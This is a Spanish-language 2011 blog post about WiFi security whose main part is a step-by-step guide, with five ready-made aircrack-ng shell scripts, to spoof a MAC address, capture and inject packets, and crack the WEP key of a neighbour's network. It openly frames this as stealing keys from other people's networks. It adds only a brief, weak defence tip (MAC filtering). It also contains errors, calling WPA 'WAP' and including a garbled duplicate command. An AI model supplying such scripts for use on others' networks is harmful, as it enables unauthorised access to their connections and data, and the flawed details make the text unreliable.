miércoles, 30 de marzo de 2011

Cosas que debes saber sobre el WIFI

Introducción
Como bien sabéis, podéis disponer en vuestras casas de conexión wifi. Muy útil para ganar movilidad en vuestra casa, sin tener que estar pegado a un cable de red para tener conexión con Internet.

Todo magia, luces y sonidos en el paradisíaco mundo del wifi hasta que te empiezan a contar que Fulanito se conecta a la red del vecino y tiene Internet. Y tu piensas ..... -"Pero eso le pasa por no tener clave para la conexión wifi"-. Es en ese momento cuando te dicen que ese usuario tenia wifi con contraseña, pero que se la han sacado.

Un escalofrió comienza a recorrer tu cuerpo y piensas. ¿Mi red es segura? ¿Estarán chupando de mi Wifi? ¿Es difícil chupar de la red Wifi de alguien? Con esta entrada para "frikis en apuros" tratare de acercaros esta realidad.

Wifi
Sobre el wifi, como ya sabéis, es un tipo de conexión inalámbrica basada en la norma IEEE 802.11 si no recuerdo mal. En general, el dispositivo al que os conectáis por este medio, en los entornos domésticos suele estar integrado en el router y al conectarnos a el formaremos parte de su red local. Esta seria la idea básica de su funcionamiento.

Una red wifi puede tener o no clave y para ello existe la encriptación del intercambio de datos basado en esa clave. Aquí los sistemas de encriptación que mas os vais a encontrar:
- WEP: Los cifrados de 64 y 128 bits. Pienso que es el tipo de clave mas fácil de hackear.
- WAP y WAP2: Las claves aquí no tienen limite de longitud lo que hace mas difícil su descifrado. El WAP2 es el WAP mejorado, aun mas seguro.

Ahora sabes como viaja la información y porque si no metes la clave no puedes conectarte a una red wifi. Y es que esa clave que metes para conectarte a la red wifi sirve para descifrar la información que intercambias de tu PC con el receptor de la conexión wifi.

Pero bueno, si esto es tan seguro ¿Como se han colado en mi red? ¿O como puedo yo probar la seguridad que tienen las redes wifi de mis vecinos? He intentado simplificar este apartado.

Robar claves en las redes Wifi
Si dispones de un sistema operativo Linux, en mi caso un Ubuntu versión 10.04 , tan solo tendrás que instalar las siguientes aplicaciones y yo te ayudare:

Nota: Si no dispones de un sistema Linux esto no te servirá de nada (también puede hacerse en windows de otra manera, pero no lo recomiendo).

Para realizar estos pasos es conveniente ser superusuario (root).
Primer paso: Instalar el aircrack-ng.

apt-get install aircrack-ng

Nota: Esto debería bastar, si te faltan aplicaciones que mas adelante se mencionaran coméntalo y editare la publicación.

Segundo paso: Hay una serie de comandos, pero he preferido simplificaros este paso y prepararos todo en 5 sencillos scripts:

1. Crea un directorio donde guardaremos los scripts, por ejemplo wifihack y otra llamada capturas dentro de esta para poder usarla posteriormente.

2. Creamos un fichero de texto y lo guardamos como "1_inicializar.sh". Este además de inicializarnos todo lo necesario, nos abrirá una ventana con todas las redes wifi a nuestro alcance, sus encriptaciones, los canales por las que se emiten (CH), sus direcciones MAC y sus bssid.

#Script 1
#Colocar la tarjeta de red para monitorear
airmon-ng start wlan0
#ApaÃño para no tener que reiniciar en el momento del hack
airmon-ng start start mon0
#damos de baja nuestro clone para falsear la dirección mac
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55
ifconfig mon0 up
#Monitoreamos las redes inalámbricas cercanas
airodump-ng mon0

3. Con este otro script comenzaremos a capturar paquetes de esa red y a registrar toda la información en un fichero para su futura desencriptación ;). Le llamaremos "2_captura.sh"

#Script 2 - captura
clear
echo Introduce el canal de la red que se desea atacar
read canal
echo Introduce el nombre donde se guardaran las capturas de los paquetes
read archivo
echo Introduce la direccion MAC de la tarjeta atacada
read macatacada
echo $canal > ultcanal.txt
echo $archivo > ultarchivo.txt
echo $macatacada > ultmac.txt
airodump-ng -c $canal -w capturas/$archivo --bssid $macatacada mon0

4. Con este asociaremos nuestro equipo con el que deseamos atacar. Le llamaremos "3_asociar.sh".

#Script 3 - asociar
#Crear una asociacion entre nuestro PC y el modem atacado
clear
echo Introduce el nombre de la red a la que desea atacar.
read nombrered
macatacada=`cat ultmac.txt`
read macatacada
aireplay-ng -1 0 -e $nombrered -a $macatacada -h 00:11:22:33:44:55 mon0

5. Con este nosotros comenzaremos a inyectar paquetes, de esta manera capturaremos muchos mas paquetes y tardaremos menos en sacarle los paquetes necesarios para descifrar la clave. Le llamaremos "4_inyeccion.sh".

#Script 4 - Inyeccion de paquetes
mac=`cat ultmac.txt`
aireplay-ng -3 -b $mac -h 00:11:22:33:44:55 mon0


6. Finalmente, el fruto de nuestro trabajo, una vez que veas que has capturado 5000 paquetes realiza la primera pruena con este script. Si aun no tienes informacion suficiente para descifrar la clave espera 5000 paquetes mas y vuelve a intentarlo, calcula cuanto te falta para tenerla por completo. Este solo sirve para WEP, para WAP necesitarías usar diccionarios, pero todo es documentarse. Llamemosle "5_desencriptar.sh".

#Script 5 - descifrar
#Descifrar el paquete
nombref=`cat ultarchivo.txt`
aircrack-ng capturas/$nombref-01.cap

o sino, mejor en este caso escribir en la linea de comandos.

aircrack-ng capturas/NOMBRE(tabular para obtener más información y escoger un archivo de extensión cap)

# aircrack-ng (nombre del archivo .cap)*.cap -z Es más rápido pero requiere
más paquetes capturados.
# aircrack-ng (nombre del archivo .cap)*.cap -y Para utilizar fuerza bruta
# aircrack-ng (combre del archivo .cap)*.cap -n 64 Para especificar la longitud de
la clave WEP en bits: 64 para 40-bit WEP; 128 para 104-bit WEP, etc. El valor por
defecto es 128 y en 2wire 64 bits.




Las dos maneras sirven, la que os sea más cómoda.

Una vez creados todos los ficheros, se les asigna permisos de ejecución (chmod) o sino mediante propiedades y los ejecutamos como super usuario en el orden correcto (basandote en el orden numerico de los nombres), cada uno en una terminal diferente y vamos rellenando lo que se nos pide.

Conclusiones
Una vez visto con la facilidad con al que un usuario medio o experto en informática puede descifrar una clave wifi y conectarse a esta pensaras que estas solo ante el peligro y la de FUUUUUUUUUUs que vas a estar deseando de soltar.

Solución para conexiones no deseadas

Como he dicho puede que te sientas solo ante el peligro, pero esto tiene solución. Si en tu red domestica se conectan siempre los mismos equipos generalmente, solo tienes que hacer una lista de sus direcciones MAC e introducirlas en la configuración wifi del router, como únicas MACs con las que se podrán acceder. Es tan solo una solución que a mi parecer es muy sencilla, pero no tiene porque ser la única.

Espero que ahora veas las redes wifi de otra manera ;)

No hay comentarios:

Publicar un comentario